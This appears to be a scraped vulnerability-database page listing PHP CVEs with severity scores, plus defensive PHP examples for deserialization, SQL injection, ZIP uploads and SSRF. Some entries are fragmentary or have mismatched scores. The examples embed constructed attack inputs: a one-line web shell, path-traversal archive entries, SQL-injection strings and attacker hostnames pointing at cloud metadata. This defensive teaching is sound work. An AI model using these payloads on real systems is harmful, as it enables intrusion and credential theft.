OpenSTAManager is an open source management software for technical assistance and invoicing. OpenSTAManager v2.9.8 and earlier contain a critical Time-Based Blind SQL Injection vulnerability in the article pricing completion handler. The application fails to properly sanitize the idarticolo parameter before using it in SQL queries, allowing attackers to inject arbitrary SQL commands and extract sensitive data through time-based Boolean inference.
Source : NVD
## 8.7
Score
Published February 6, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.5
Wiz
CVE-2026-22242 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.9
CVE-2026-22242 [MEDIUM] CVE-2026-22242 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22242 :
PHP vulnerability analysis and mitigation
CoreShop is a Pimcore enhanced eCommerce solution. Prior to version 4.1.8, a blind SQL injection vulnerability exists in the application that allows an authenticated administrator-level user to extract database contents using boolean-based or time-based techniques. The database account used by the application is read-only and non-DBA, limiting impact to confidential data disclosure only. No data modification or service disruption is possible. This issue has been patched in version 4.1.8.
Source : NVD
## 4.9
Score
Published January 8, 2026
Severity MEDIUM
CNA Score 4.9
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
CVE-2026-27939 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-27939 [HIGH] CVE-2026-27939 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27939 :
PHP vulnerability analysis and mitigation
Statamic is a Laravel and Git powered content management system (CMS). Starting in version 6.0.0 and prior to version 6.4.0, authenticated Control Panel users may under certain conditions obtain elevated privileges without completing the intended verification step. This can allow access to sensitive operations and, depending on the user’s existing permissions, may lead to privilege escalation. This has been fixed in 6.4.0.
Source : NVD
## 8.8
Score
Published February 27, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5
Exploitation Probability (EPSS) N/A
Wiz
CVE-2026-35179 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-35179 [MEDIUM] CVE-2026-35179 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35179 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 26.0 and prior, the SocialMediaPublisher plugin exposes a publishInstagram.json.php endpoint that acts as an unauthenticated proxy to the Facebook/Instagram Graph API. The endpoint accepts user-controlled parameters including an access token, container ID, and Instagram account ID, and passes them directly to the Graph API via InstagramUploader::publishMediaIfIsReady(). This allows any unauthenticated user to make arbitrary Graph API calls through the server, potentially using stolen tokens or abusing the platform's own credentials.
Source : NVD
## 5.3
Score
Published April 6, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit No
Wiz
CVE-2026-34372 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-34372 [MEDIUM] CVE-2026-34372 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34372 :
PHP vulnerability analysis and mitigation
Sulu is an open-source PHP content management system based on the Symfony framework. From versions 1.0.0 to before 2.6.22, and 3.0.0 to before 3.0.5, a user who has permission for the Sulu Admin via at least one role could have access to the sub-entities of contacts via the admin API without even having permission for contacts. This issue has been patched in versions 2.6.22 and 3.0.5.
Source : NVD
## 5.3
Score
Published March 31, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
sulu/sulu
Wiz
CVE-2026-2898 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2026-2898 [MEDIUM] CVE-2026-2898 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2898 :
PHP vulnerability analysis and mitigation
A vulnerability was detected in funadmin up to 7.1.0-rc4. This issue affects the function getMember of the file app/common/service/AuthCloudService.php of the component Backend Endpoint. The manipulation of the argument cloud_account results in deserialization. The attack may be performed from remote. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
## 5.1
Score
Published February 22, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.9
Exploitation Probability (EPSS) N/A
Wiz
CVE-2026-29069 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-29069 [MEDIUM] CVE-2026-29069 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29069 :
PHP vulnerability analysis and mitigation
Craft is a content management system (CMS). Prior to 5.9.0-beta.2 and 4.17.0-beta.2, the actionSendActivationEmail() endpoint is accessible to unauthenticated users and does not require a permission check for pending users. An attacker with no prior access can trigger activation emails for any pending user account by knowing or guessing the user ID. If the attacker controls the target user’s email address, they can activate the account and gain access to the system. This vulnerability is fixed in 5.9.0-beta.2 and 4.17.0-beta.2.
Source : NVD
## 6.9
Score
Published March 4, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
PHP
Craft CMS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
Wiz
CVE-2026-33182 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.6
CVE-2026-33182 [MEDIUM] CVE-2026-33182 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33182 :
PHP vulnerability analysis and mitigation
Saloon is a PHP library that gives users tools to build API integrations and SDKs. Prior to version 4.0.0, when building the request URL, Saloon combined the connector's base URL with the request endpoint. If the endpoint was a valid absolute URL, the code used that URL as-is and ignored the base URL. The request—and any authentication headers, cookies, or tokens attached by the connector—was then sent to the attacker-controlled host. If the endpoint could be influenced by user input or configuration (e.g. redirect_uri, callback URL), this allowed server-side request forgery (SSRF) and/or credential leakage to a third-party host. The fix in version 4.0.0 is to reject absolute URLs in the endpoint: URLHelper::join() throws Inva
Wiz
GHSA-f9jp-856v-8642 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
[MEDIUM] GHSA-f9jp-856v-8642 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-f9jp-856v-8642 :
PHP vulnerability analysis and mitigation
## Summary
World
World->getEntity($entityId)
World->getEntity($entityId)
## Reproducing steps
To reproduce this vulnerability, two clients (Player A and Player B) are required.
Prerequisites:
- Player A (Victim): Must have the valuable items to be duplicated in their inventory and 1 HP (to ensure instant death).
- Player B (Attacker): Must be equipped with a weapon capable of dealing at least 1 damage.
Steps:
1. Player A and Player B stand next to each other.
2. Player A initiates the disconnect sequence (e.g., clicking "Disconnect" or "Exit to Menu").
3. Immediately after Player A triggers the disconnect (within a split-second window), Player B must attack and kill Player A.
4. Player A's character dies server-si
Wiz
CVE-2026-33158 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.9
CVE-2026-33158 [MEDIUM] CVE-2026-33158 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33158 :
PHP vulnerability analysis and mitigation
Craft CMS is a content management system (CMS). From version 4.0.0-RC1 to before version 4.17.8 and from version 5.0.0-RC1 to before version 5.9.14, a low-privileged authenticated user can read private asset content by calling assets/edit-image with an arbitrary assetId that they are not authorized to view. The endpoint returns image bytes (or a preview redirect) without enforcing a per-asset view authorization check, leading to potential unauthorized disclosure of private files. This issue has been patched in versions 4.17.8 and 5.9.14.
Source : NVD
## 4.9
Score
Published March 24, 2026
Severity MEDIUM
CNA Score 4.9
Affected Technologies
PHP
Craft CMS
Has Public Exploit No
Has CISA KEV Exploit No
Wiz
CVE-2026-33648 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-33648 [HIGH] CVE-2026-33648 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33648 :
PHP vulnerability analysis and mitigation
users_id
liveTransmitionHistory_id
exec()
$()
Source : NVD
## 8.8
Score
Published March 23, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 21.1
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 26, 2026
Wiz
GHSA-f3r2-88mq-9v4g Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
[MEDIUM] GHSA-f3r2-88mq-9v4g Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-f3r2-88mq-9v4g :
PHP vulnerability analysis and mitigation
## Description
In applications built with the Auth0-PHP SDK, the audience validation in access tokens is performed improperly. Without proper validation, affected applications may accept ID tokens as Access tokens.
## Affected product and versions
Projects are affected if they meet the following preconditions:
Applications using the Auth0 Symfony SDK with versions between 5.0.0 and 5.5.0
Auth0 Symfony SDK uses the Auth0-PHP SDK with versions between 8.0.0 and 8.17.0.
## Resolution
Upgrade Auth0/symfony to version 5.6.0 or greater.
## Acknowledgement
Okta would like to thank Jafar Sadiq (iaf4r) for their discovery and responsible disclosure.
Source : NVD
## 6.8
Score
Published December 17, 2025
Wiz
CVE-2025-59020 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-59020 [MEDIUM] CVE-2025-59020 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-59020 :
PHP vulnerability analysis and mitigation
By exploiting the defVals parameter, attackers could bypass field‑level access checks during record creation in the TYPO3 backend. This gave them the ability to insert arbitrary data into prohibited exclude fields of a database table for which the user already has write permission for a reduced set of fields. This issue affects TYPO3 CMS versions 10.0.0-10.4.54, 11.0.0-11.5.48, 12.0.0-12.4.40, 13.0.0-13.4.22 and 14.0.0-14.0.1.
Source : NVD
## 5.3
Score
Published January 13, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Typo3
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.9
Wiz
CVE-2026-33292 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-33292 [HIGH] CVE-2026-33292 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33292 :
PHP vulnerability analysis and mitigation
view/hls.php
videoDirectory
/
..
Source: NVD. Score 7.5; published March 22, 2026; severity HIGH; CNA score 7.5. Affected technologies: PHP. Public exploit: Yes. CISA KEV: No (release date N/A, due date N/A). EPSS percentile: 14.8; EPSS probability: N/A. Affected package: wwbn/avideo (Composer advisory: severity HIGH, no fix, added Mar 20, 2026).
## CVE-2026-3242 (Wiz, CVSS 4.8, MEDIUM): PHP vulnerability analysis and mitigation
In Concrete CMS below version 9.4.8, a rogue administrator can add stored XSS via the Switch Language block. The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 4.8 with vector `CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N`. Thanks M3dium for reporting.
Source: NVD. Score 4.8; published March 4, 2026; severity MEDIUM; CNA score 4.8. Affected technologies: PHP. Public exploit: Yes. CISA KEV: No (release date N/A, due date N/A). EPSS percentile: 5.5; EPSS probability: N/A. Affected package: concrete5/concrete5 (Composer advisory: severity MEDIUM, has fix, added Mar 05, 2026).
## CVE-2026-29176 (Wiz, CVSS 4.8, MEDIUM): PHP vulnerability analysis and mitigation
Craft Commerce is an ecommerce platform for Craft CMS. Prior to 5.5.3, a stored XSS vulnerability exists in the Commerce Settings - Inventory Locations page. The Name field is rendered without proper HTML escaping, allowing an attacker to execute arbitrary JavaScript. The XSS triggers when an administrator (or a user with product editing permissions) creates or edits a variant product. This vulnerability is fixed in 5.5.3.
Source: NVD. Score 4.8; published March 10, 2026; severity MEDIUM; CNA score 4.8. Affected technologies: PHP. Public exploit: No. CISA KEV: No (release date N/A, due date N/A). EPSS percentile: 0.7; EPSS probability: N/A.
## CVE-2026-34732 (Wiz, CVSS 5.3, MEDIUM): PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 26.0 and prior, the AVideo CreatePlugin template for list.json.php does not include any authentication or authorization check. While the companion templates add.json.php and delete.json.php both require admin privileges, the list.json.php template was shipped without this guard. Every plugin that uses the CreatePlugin code generator inherits this omission, resulting in 21 unauthenticated data listing endpoints across the platform. These endpoints expose sensitive data including user PII, payment transaction logs, IP addresses, user agents, and internal system records. At time of publication, there are no publicly available patches.
Source: NVD. Score 7.5.
## CVE-2026-1323 (Wiz, CVSS 5.2, MEDIUM): PHP vulnerability analysis and mitigation
The extension fails to define the allowed classes used when deserializing transport failure metadata. An attacker may exploit this to have arbitrary classes instantiated during deserialization (PHP object injection) and so run untrusted code through their magic methods. Note that an active exploit requires write access to the directory configured at `$GLOBALS['TYPO3_CONF_VARS']['MAIL']['transport_spool_filepath']`.
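What the missing `allowed_classes` option changes is easiest to see side by side. The block below is an added example, not cpsit/typo3-mailqueue code: the two class names are hypothetical stand-ins, both serialized payloads are constructed, and the loader is called once without restriction and once with the allow-list the advisory says was missing.

```php
<?php
// Added example, not cpsit/typo3-mailqueue code. Shows unserialize() on a
// spool entry with and without an allowed_classes list. Class names are
// hypothetical; both payloads are constructed.

final class TransportFailure          // the only type the spool format should carry
{
    public string $message = '';
    public int $attempts = 0;
}

final class DangerousGadget           // stands in for any class with abusable magic methods
{
    public string $cmd = '';

    public function __destruct()
    {
        // A real gadget would act on $this->cmd here (write a file, run a command).
        echo "DangerousGadget destructor reached with cmd={$this->cmd}\n";
    }
}

function load_failure_metadata(string $blob, bool $restricted)
{
    $options = $restricted ? ['allowed_classes' => [TransportFailure::class]] : [];
    return unserialize($blob, $options);
}

// Constructed spool entries: one legitimate, one written by an attacker with
// access to transport_spool_filepath
$legit   = 'O:16:"TransportFailure":2:{s:7:"message";s:7:"timeout";s:8:"attempts";i:3;}';
$hostile = 'O:15:"DangerousGadget":1:{s:3:"cmd";s:10:"touch /tmp";}';

echo "legit, restricted: ", get_class(load_failure_metadata($legit, true)), "\n";

$r1 = load_failure_metadata($hostile, false);
echo "hostile, unrestricted: ", get_class($r1), "\n";
unset($r1);                                     // destructor of the attacker's object runs here

$r2 = load_failure_metadata($hostile, true);
echo "hostile, restricted: ", get_class($r2), "\n";
unset($r2);                                     // nothing runs: the object has no methods
```

With the allow-list, the hostile entry comes back as a `__PHP_Incomplete_Class` instance: its properties are preserved but it has no methods, so no destructor, wakeup or string conversion fires. The legitimate entry deserializes to `TransportFailure` in both modes. For metadata that is pure data, `'allowed_classes' => false` (or a JSON encoding) is the stricter choice; an allow-list is the minimum when objects are genuinely needed.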
Source: NVD. Score 5.2; published March 17, 2026; severity MEDIUM; CNA score 5.2. Affected technologies: PHP. Public exploit: No. CISA KEV: No (release date N/A, due date N/A). EPSS percentile: 5.3; EPSS probability: N/A. Affected package: cpsit/typo3-mailqueue (Composer advisory: severity MEDIUM, has fix; date added truncated).
## CVE-2026-33479 (Wiz, CVSS 8.8, HIGH): PHP vulnerability analysis and mitigation
Only code identifiers survive from this entry's description: `saveSort.json.php`, `$_REQUEST['sections']`, `eval()`, `User::isAdmin()`, `SameSite=None`.
Source: NVD. Score 8.8; published March 23, 2026; severity HIGH; CNA score 8.8. Affected technologies: PHP. Public exploit: Yes. CISA KEV: No (release date N/A, due date N/A). EPSS percentile: 34.6; EPSS probability: 0.1. Affected package: wwbn/avideo (Composer advisory: severity HIGH, no fix, added Mar 21, 2026).
## CVE-2026-32813 (Wiz, CVSS 8.0, HIGH): PHP vulnerability analysis and mitigation
Admidio is an open-source user management solution. Versions 5.0.6 and below are vulnerable to arbitrary SQL Injection through the MyList configuration feature. The MyList configuration feature lets authenticated users define custom list column layouts, storing user-supplied column names, sort directions, and filter conditions in the adm_list_columns table via prepared statements. However, these stored values are later read back and interpolated directly into dynamically constructed SQL queries without sanitization or parameterization, creating a classic second-order SQL injection vulnerability (safe write, unsafe read). An attacker can exploit this to inject arbitrary SQL, potentially reading, modifying, or deleting any data
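The "safe write, unsafe read" shape described above is worth seeing in code, because the fix is not "use prepared statements" (the write already does) but "treat stored identifiers as untrusted when they come back". The block below is an added example, not Admidio code: the `members` table, its columns and the stored list definitions are constructed, and an in-memory SQLite database stands in for the real one.

```php
<?php
// Added example, not Admidio code. A stored list definition (columns, sort
// column, direction, optional filter) is read back and turned into SQL. Column
// names are matched against the table's real columns, direction is reduced to
// ASC/DESC, and the filter value is bound. Uses an in-memory SQLite stand-in.

$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE members (id INTEGER PRIMARY KEY, last_name TEXT, email TEXT, password_hash TEXT)');
$pdo->exec("INSERT INTO members VALUES (1, 'Doe', 'doe@example.org', 'hash-1'), (2, 'Roe', 'roe@example.org', 'hash-2')");

/** Columns of $table that a list may reference; secret columns are never listable. */
function listable_columns(PDO $pdo, string $table, array $hidden): array
{
    $cols = [];
    foreach ($pdo->query("PRAGMA table_info($table)") as $row) {
        $cols[] = $row['name'];
    }
    return array_values(array_diff($cols, $hidden));
}

function require_column(string $name, array $allowed): string
{
    if (!in_array($name, $allowed, true)) {
        throw new InvalidArgumentException("stored list references unknown column: $name");
    }
    return '"' . $name . '"';         // quoted only after it matched a real column
}

/** Returns [sql, params] for a stored (and therefore untrusted) list definition. */
function build_list_query(PDO $pdo, array $def): array
{
    $allowed = listable_columns($pdo, 'members', ['password_hash']);
    $select  = array_map(fn ($c) => require_column($c, $allowed), $def['columns']);
    $order   = require_column($def['order_by'], $allowed);
    $dir     = strtoupper($def['direction'] ?? '') === 'DESC' ? 'DESC' : 'ASC';

    $sql = 'SELECT ' . implode(', ', $select) . ' FROM members';
    $params = [];
    if (isset($def['filter'])) {
        [$col, $value] = $def['filter'];
        $sql .= ' WHERE ' . require_column($col, $allowed) . ' = :v';
        $params[':v'] = $value;       // bound, never interpolated
    }
    return [$sql . " ORDER BY $order $dir", $params];
}

function run_list(PDO $pdo, array $def): array
{
    [$sql, $params] = build_list_query($pdo, $def);
    $st = $pdo->prepare($sql);
    $st->execute($params);
    return $st->fetchAll(PDO::FETCH_ASSOC);
}

// 1. A normal stored definition
print_r(run_list($pdo, ['columns' => ['last_name', 'email'], 'order_by' => 'last_name', 'direction' => 'DESC']));

// 2. Definitions tampered with earlier through the "safe write" path
print_r(run_list($pdo, ['columns' => ['last_name'], 'order_by' => 'id', 'direction' => 'ASC',
                        'filter' => ['last_name', "' OR 1=1 --"]]));
try {
    run_list($pdo, ['columns' => ['last_name'], 'order_by' => '(SELECT password_hash FROM members)', 'direction' => 'ASC']);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}
```

The tampered filter value returns no rows rather than every row, because it travels as a bound parameter; the tampered sort expression never reaches SQL at all, because it is not one of the table's columns. The allow-list is derived from the schema at run time, so adding a column to the table does not require touching the list code, while secrets such as `password_hash` are excluded explicitly.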
## CVE-2026-34568 (Wiz, CVSS 9.1, CRITICAL): PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input when creating or editing blog posts. An attacker can inject a malicious JavaScript payload into blog post content, which is then stored server-side. This stored payload is later rendered unsafely in multiple application views without proper output encoding, leading to stored cross-site scripting (XSS). This issue has been patched in version 0.31.0.0.
Source: NVD. Score 9; published April 1, 2026; severity CRITICAL; CNA score 9.1. Affected technologies: PHP. Public exploit: Yes.
## CVE-2026-28502 (Wiz, CVSS 9.3, CRITICAL): PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. Prior to version 24.0, an authenticated Remote Code Execution (RCE) vulnerability was identified in AVideo related to the plugin upload/import functionality. The issue allowed an authenticated administrator to upload a specially crafted ZIP archive containing executable server-side files. Due to insufficient validation of extracted file contents, the archive was extracted directly into a web-accessible plugin directory, allowing arbitrary PHP code execution. This issue has been patched in version 24.0.
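The advisory names two weaknesses: the archive's entries were not validated, and extraction landed directly in a web-accessible directory. The block below is an added example, not AVideo code and not its fix, showing what entry validation looks like before a single byte is written: path traversal, symlink and executable-extension checks, applied to a constructed upload. For an archive that is supposed to carry code, as a plugin is, the extension rule cannot apply; there the control has to be provenance (a verified signature or a fixed trusted source) and the path checks still hold.

```php
<?php
// Added example, not AVideo code. Every entry of an uploaded archive is vetted
// before anything is written: no absolute or traversing paths, no symlinks,
// and, for archives that should hold only assets, no extensions the web
// server would execute. An archive with any bad entry is rejected whole.
// The sample archive is constructed in a temp directory.

const SERVER_EXECUTABLE = ['php', 'php3', 'php4', 'php5', 'php7', 'php8', 'phtml', 'phps', 'phar', 'htaccess', 'cgi', 'shtml'];

/** $allowedExt = null means "archive is expected to carry code; caller verified its origin". */
function zip_entry_problems(ZipArchive $zip, ?array $allowedExt): array
{
    $problems = [];
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $name = $zip->statIndex($i)['name'];
        if ($name === '' || $name[0] === '/' || strpos($name, "\0") !== false
            || preg_match('~^[A-Za-z]:~', $name) || preg_match('~(^|/)\.\.(/|$)~', $name)) {
            $problems[] = "$name: path leaves the target directory";
            continue;
        }
        // On archives made on Unix the file mode sits in the high 16 bits of the external attributes
        if ($zip->getExternalAttributesIndex($i, $opsys, $attr)
            && $opsys === ZipArchive::OPSYS_UNIX && (($attr >> 16) & 0170000) === 0120000) {
            $problems[] = "$name: symbolic link";
            continue;
        }
        if ($allowedExt === null || substr($name, -1) === '/') {
            continue;                      // code archive, or a directory entry
        }
        // Every dotted part counts, so shell.php.png and .htaccess are both caught
        $parts = array_values(array_filter(explode('.', strtolower(basename($name))), 'strlen'));
        if (array_intersect($parts, SERVER_EXECUTABLE)) {
            $problems[] = "$name: server-executable name";
        } elseif (count($parts) > 1 && !in_array(end($parts), $allowedExt, true)) {
            $problems[] = "$name: extension '" . end($parts) . "' not allowed";
        }
    }
    return $problems;
}

function extract_upload(string $zipPath, string $dest, ?array $allowedExt): array
{
    $zip = new ZipArchive();
    if ($zip->open($zipPath) !== true) {
        throw new RuntimeException("cannot open $zipPath");
    }
    $problems = zip_entry_problems($zip, $allowedExt);
    if (!$problems) {
        $zip->extractTo($dest);        // only reached when every entry passed
    }
    $zip->close();
    return $problems;
}

// Constructed upload: one asset, one traversal entry, one PHP file disguised as an image
$tmp = sys_get_temp_dir() . '/upload-' . bin2hex(random_bytes(4));
mkdir($tmp, 0700);
$zip = new ZipArchive();
$zip->open("$tmp/theme.zip", ZipArchive::CREATE);
$zip->addFromString('theme/logo.png', "\x89PNG\r\n");
$zip->addFromString('../../index.php', '<?php echo "owned";');
$zip->addFromString('theme/shell.php.png', '<?php system($_GET["c"]);');
$zip->close();

print_r(extract_upload("$tmp/theme.zip", "$tmp/out", ['png', 'jpg', 'css', 'js', 'json']));
unlink("$tmp/theme.zip");
rmdir($tmp);
```

The printed list names the two bad entries and nothing is extracted. Whatever passes should still be unpacked into a staging directory outside the document root and moved into place afterwards, so that a server misconfiguration cannot serve half-written files during extraction.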
Source: NVD. Score 9.3; published March 6, 2026; severity CRITICAL; CNA score 9.3. Affected technologies: PHP. Public exploit: No. CISA KEV: No.
## CVE-2026-33685 (Wiz, CVSS 5.3, MEDIUM): PHP vulnerability analysis and mitigation
Only code identifiers survive from this entry's description: `plugin/AD_Server/reports.json.php`, `reports.php`, `getCSV.php`, `User::isAdmin()`.
Source: NVD. Score 5.3; published March 23, 2026; severity MEDIUM; CNA score 5.3. Affected technologies: PHP. Public exploit: Yes. CISA KEV: No (release date N/A, due date N/A). EPSS percentile: 27; EPSS probability: 0.1. Affected package: wwbn/avideo (Composer advisory: severity MEDIUM, no fix, added Mar 26, 2026).
## CVE-2026-26992 (Wiz, CVSS 5.1, MEDIUM): PHP vulnerability analysis and mitigation
LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. In versions 26.1.1 and below, the port group name is not sanitized, allowing attackers with admin privileges to perform Stored Cross-Site Scripting (XSS) attacks. When a user adds a port group, an HTTP POST request is sent to the Request-URI "/port-groups". The name of the newly created port group is stored in the value of the name parameter. After the port group is created, the entry is displayed along with relevant buttons such as Edit and Delete. This issue has been fixed in version 26.2.0.
Source: NVD. Score 5.1; published February 20, 2026; severity MEDIUM; CNA score 5.1. Affected technologies: PHP. Public exploit: Yes.
## CVE-2026-33171 (Wiz, CVSS 4.3, MEDIUM): PHP vulnerability analysis and mitigation
Only code identifiers survive from this entry's description: `.json`, `.yaml`, `.csv`, `filename`.
Source: NVD. Score 4.3; published March 20, 2026; severity MEDIUM; CNA score 4.3. Affected technologies: PHP. Public exploit: No. CISA KEV: No (release date N/A, due date N/A). EPSS percentile: 1.9; EPSS probability: N/A. Affected package: statamic/cms (Composer advisory: severity MEDIUM, has fix, added Mar 19, 2026).
## CVE-2025-59021 (Wiz, CVSS 5.3, MEDIUM): PHP vulnerability analysis and mitigation
Backend users with access to the redirects module and write permission on the sys_redirect table were able to read, create, and modify any redirect record without restriction to the user’s own file-mounts or web-mounts. This allowed attackers to insert or alter redirects pointing to arbitrary URLs – facilitating phishing or other malicious redirect attacks. This issue affects TYPO3 CMS versions 10.0.0-10.4.54, 11.0.0-11.5.48, 12.0.0-12.4.40, 13.0.0-13.4.22 and 14.0.0-14.0.1.
Source: NVD. Score 5.3; published January 13, 2026; severity MEDIUM; CNA score 5.3. Affected technologies: PHP, TYPO3. Public exploit: No. CISA KEV: No (release date N/A, due date N/A).
## CVE-2026-32267 (Wiz, CVSS 7.7, HIGH): PHP vulnerability analysis and mitigation
Craft CMS is a content management system (CMS). From version 4.0.0-RC1 to before version 4.17.6 and from version 5.0.0-RC1 to before version 5.9.12, a low-privilege user (or an unauthenticated user who has been sent a shared URL) can escalate their privileges to admin by abusing UsersController->actionImpersonateWithToken. This issue has been patched in versions 4.17.6 and 5.9.12.
Source: NVD. Score 7.7; published March 16, 2026; severity HIGH; CNA score 7.7. Affected technologies: PHP, Craft CMS. Public exploit: Yes. CISA KEV: No (release date N/A, due date N/A). EPSS percentile: 10.1; EPSS probability: N/A. Affected packages: cpe:2.3 (identifier truncated).
## CVE-2026-25492 (Wiz, CVSS 5.3, MEDIUM): PHP vulnerability analysis and mitigation
Craft CMS is a content management system. In Craft versions 3.5.0 through 4.16.17 and 5.0.0-RC1 through 5.8.21, the save_images_Asset GraphQL mutation can be abused to fetch internal URLs by providing a domain name that resolves to an internal IP address, bypassing hostname validation. When a non-image file extension such as .txt is allowed, downstream image validation is bypassed, which can allow an authenticated attacker with permission to use save_images_Asset to retrieve sensitive data such as AWS instance metadata credentials from the underlying host. This issue is patched in versions 4.16.18 and 5.8.22.
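The bypass above works because the hostname is checked as a string while the HTTP client connects to whatever it resolves to. The block below is an added example, not Craft CMS code: it resolves the host itself, rejects any non-public address (the 169.254.169.254 metadata endpoint included), and returns the vetted IP for the client to pin. The DNS table is constructed and injected so the demo runs offline.

```php
<?php
// Added example (not Craft CMS code). Resolves the requested host itself,
// refuses any address that is private, loopback, link-local or otherwise
// reserved (169.254.169.254 included), and reports the vetted IP the HTTP
// client should connect to. The resolver is injectable so the demo runs
// offline against a constructed DNS table.

function ip_is_public(string $ip): bool
{
    // NO_PRIV_RANGE: 10/8, 172.16/12, 192.168/16, fc00::/7
    // NO_RES_RANGE:  0/8, 127/8, 169.254/16, 240/4, ::1, ::/128, ::ffff:0:0/96, fe80::/10
    return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}

function vet_fetch_target(string $url, ?callable $resolver = null): array
{
    $resolver = $resolver ?? fn (string $h): array => gethostbynamel($h) ?: [];
    $u = parse_url($url);
    if ($u === false || !in_array($u['scheme'] ?? '', ['http', 'https'], true) || empty($u['host'])) {
        return ['ok' => false, 'reason' => 'only http(s) URLs with a host are fetched'];
    }
    $host = trim($u['host'], '[]');                         // parse_url keeps IPv6 brackets
    $ips  = filter_var($host, FILTER_VALIDATE_IP) !== false ? [$host] : $resolver($host);
    if (!$ips) {
        return ['ok' => false, 'reason' => "$host does not resolve"];
    }
    foreach ($ips as $ip) {                                 // every record must be public
        if (!ip_is_public($ip)) {
            return ['ok' => false, 'reason' => "$host resolves to non-public address $ip"];
        }
    }
    // Connect to this IP (e.g. via CURLOPT_RESOLVE) and send Host: $host, so that a
    // second lookup at connect time cannot return a different answer (DNS rebinding).
    return ['ok' => true, 'connect_ip' => $ips[0], 'host_header' => $host];
}

// Constructed DNS table standing in for real resolution
$table = [
    'cdn.example.org'           => ['203.0.113.10'],
    'metadata.attacker.example' => ['169.254.169.254'],
    'intranet.attacker.example' => ['10.0.0.5'],
    'rebind.attacker.example'   => ['203.0.113.20', '192.168.1.1'],
];
$resolver = fn (string $h): array => $table[$h] ?? [];

foreach ([
    'https://cdn.example.org/image.png',
    'http://metadata.attacker.example/latest/meta-data/',
    'http://intranet.attacker.example/',
    'http://rebind.attacker.example/',
    'http://127.0.0.1/',
    'http://[::1]/',
    'ftp://cdn.example.org/',
] as $url) {
    echo $url, ' => ', json_encode(vet_fetch_target($url, $resolver)), "\n";
}
```

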